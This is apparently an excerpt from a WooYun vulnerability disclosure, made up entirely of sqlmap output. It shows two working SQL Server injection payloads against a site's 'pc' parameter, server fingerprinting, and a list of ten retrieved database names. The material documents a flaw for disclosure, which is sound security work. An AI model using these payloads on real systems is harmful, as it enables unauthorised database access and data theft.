WooYun.org

GET parameter 'pc' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 55 HTTP(s) requests:
---
Place: GET
Parameter: pc
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pc=wdk%' AND 6376=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(119)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6376=6376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(121)+CHAR(117)+CHAR(113))) AND '%'='&city=beijing
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pc=wdk%' AND 4874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&city=beijing
---
[00:15:04] [INFO] testing Microsoft SQL Server
[00:15:04] [INFO] confirming Microsoft SQL Server
[00:15:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[00:15:05] [INFO] fetching database names
[00:15:06] [INFO] the SQL query used returns 10 entries
[00:15:06] [INFO] retrieved: db_piclib
[00:15:06] [INFO] retrieved: dnn
[00:15:07] [INFO] retrieved: gtaocenter
[00:15:07] [INFO] retrieved: master
[00:15:07] [INFO] retrieved: model
[00:15:07] [INFO] retrieved: msdb
[00:15:08] [INFO] retrieved: ReportServer
[00:15:08] [INFO] retrieved: ReportServerTempDB
[00:15:08] [INFO] retrieved: tempdb
[00:15:09] [INFO] retrieved: test
available databases [10]:
[*] db_piclib
[*] dnn
[*] gtaocenter
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test